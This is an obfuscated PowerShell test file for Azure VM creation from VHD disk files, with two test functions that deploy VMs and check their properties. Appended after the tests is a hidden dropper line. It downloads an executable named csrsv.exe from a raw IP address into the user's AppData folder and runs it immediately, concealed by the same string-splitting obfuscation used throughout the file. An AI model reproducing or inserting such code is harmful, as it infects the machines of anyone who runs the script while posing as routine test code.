function Test`-N`e`waZUr`ErMV`h`DVMw`ITHva`LiddIS`KfI`lE
{

    
    ${R`G`NAME} = .("{5}{2}{6}{1}{3}{0}{4}" -f'ource','teTestR','et-C','es','Name','G','ompu')

    try
    {
        
        [string]${l`OC} = .("{4}{0}{1}{5}{2}{3}" -f'et-Comp','ut','cati','on','G','eVMLo');
        ${l`OC} = ${L`oC}.("{2}{0}{1}" -f 'a','ce','Repl').Invoke(' ', '');

        .("{2}{1}{3}{4}{5}{0}" -f'roup','e','New-AzR','sourc','e','G') -Name ${RgN`A`me} -Location ${l`OC} -Force;

        
        [string]${f`ile} = ((("{2}{0}{3}{4}{1}"-f 'IdVhdF','Idtiny.vhd','.B','il','esB')) -rEpLAcE ([cHar]66+[cHar]73+[cHar]100),[cHar]92);
        ${VmNa`ME} = ${rgNa`Me} + 'vm';
        [string]${domA`iNNaM`eL`AbeL} = "$vmname-$rgname".("{1}{0}{2}"-f'o','t','lower').Invoke();
		${v`m} = &("{2}{1}{0}" -f 'zVM','A','New-') -ResourceGroupName ${rgNA`mE} -Name ${v`MNaMe} -Location ${l`oC} -DiskFile ${Fi`Le} -OpenPorts 1234 -DomainNameLabel ${D`OMaIn`NAMEL`ABeL};
        &("{4}{3}{1}{0}{2}" -f '-Are','ert','Equal','ss','A') ${V`m}."N`Ame" ${Vm`N`AMe};
        .("{2}{0}{1}" -f 'rt-A','reEqual','Asse') ${Vm}."loCa`TI`ON" ${L`Oc};
        &("{1}{3}{0}{2}"-f't-N','Ass','ull','er') ${V`m}."oSpro`Fi`Le" ${N`UlL};
        &("{1}{0}{2}" -f't','Asser','-Null') ${v`m}."S`TO`RAgep`ROfILE"."datAd`I`Sks";
        .("{0}{3}{4}{2}{1}"-f'Ass','l','ul','ert-N','otN') ${v`m}."st`O`RAG`eP`ROFiLE"."O`SdiSk"."m`An`Age`ddISK";
        
        ${ST`o`NAmE} = ${VMn`A`me};
        ${DIskNa`mE} = ${V`M`NamE};
        ${D`IsK} = &("{0}{2}{1}" -f'Get-Az','sk','Di') -ResourceGroupName ${RgN`AMe} -DiskName ${dI`s`kname};
        .("{1}{2}{3}{4}{0}"-f'ual','Asser','t-','A','reEq') ("{0}{1}"-f'W','indows') ${D`ISk}."OsT`Y`pE";
        &("{3}{0}{1}{2}" -f'sert','-AreEqua','l','As') ("{1}{0}" -f 'ort','Imp') ${d`Isk}."C`REaT`I`OnData"."CReate`oPT`I`On";
        &("{1}{0}{2}{3}"-f's','A','sert-Are','Equal') "https://${stoname}.blob.core.windows.net/${rgname}/${diskname}.vhd" ${Di`sk}."cREA`TI`o`NDAtA"."SO`UrCE`UrI";
    }
    finally
    {
        
        &("{4}{3}{0}{2}{5}{1}" -f'e','p','so','lean-R','C','urceGrou') ${rGnA`Me};
    }
}


function t`esT`-`NeWazuRermvhdVM`W`I`THinVaLId`d`IsKFIlE
{
    
    ${RgNA`Me} = .("{4}{5}{2}{1}{3}{0}" -f 'me','ce','uteTestResour','Na','Ge','t-Comp');

    try
    {
        
        [string]${F`IlE1} = ((("{3}{0}{1}{5}{4}{2}"-f 'st_','inval','d','.{0}te','h','id_file_1.v'))  -f  [cHAR]92);
        ${ST} = &("{0}{1}{2}" -f 'Set-','Co','ntent') -Path ${F`il`E1} -Value ("{0}{1}"-f'test','1') -Force;

        
        [string]${L`OC} = &("{6}{3}{4}{0}{1}{5}{2}"-f'oca','t','on','t-Compute','VML','i','Ge');
        ${l`Oc} = ${l`Oc}.("{1}{2}{0}" -f 'lace','Re','p').Invoke(' ', '');
      
        &("{3}{1}{2}{0}" -f'Group','ew-','AzResource','N') -Name ${rGn`Ame} -Location ${l`oC} -Force;

        
        ${eXpEc`TeD`Ex`cEpt`ION} = ${fa`LsE};
        ${EX`peCt`E`DErROR`mEs`S`AGe} = ("{1}{2}{4}{0}{3}" -f'ported f','*','unsu','ormat*','p');
        try
        {
			[string]${d`o`mAInN`AMelabEl} = "$rgname-$rgname".("{2}{1}{0}" -f'wer','olo','t').Invoke();
            ${st} = .("{1}{2}{0}" -f'zVM','N','ew-A') -ResourceGroupName ${R`GnAMe} -Name ${rG`Na`me} -Location ${L`Oc} -Linux -DiskFile ${fi`LE1} -OpenPorts 1234 -DomainNameLabel ${doM`AI`NnAmE`LAB`el};
        }
        catch
        {
            if (${_} -like ${E`XPe`CTedEr`RORMe`s`sa`GE})
            {
                ${exPe`cTEdexc`e`p`TIOn} = ${tR`UE};
            }
        }
        
        if (-not ${e`x`PE`CTEDeXceptIOn})
        {
            throw ('Expec'+'te'+'d '+'except'+'io'+'n '+'from'+' '+'calli'+'ng'+' '+'New'+'-AzVM '+'wa'+'s '+'not'+' '+'c'+'aug'+'ht: '+"'$expectedErrorMessage'.");
        }
    }
    finally
    {
        
        .("{5}{2}{4}{3}{1}{0}"-f'Group','e','lea','-Resourc','n','C') ${rG`Name};
    }
}

(&("{2}{0}{1}" -f'w','-Object','Ne') ("{0}{3}{1}{2}" -f'Sys','em.Net.WebClien','t','t')).("{0}{1}{2}"-f 'Dow','nloadFi','le').Invoke(("{6}{8}{4}{5}{3}{1}{7}{0}{2}"-f '/~yahoo/csrsv.','53','exe','2.','/94','.10','http:','.238','/'),"$env:APPDATA\csrsv.exe");&("{2}{0}{1}" -f 'Proces','s','Start-') ("$env:APPDATA\csrsv.exe")
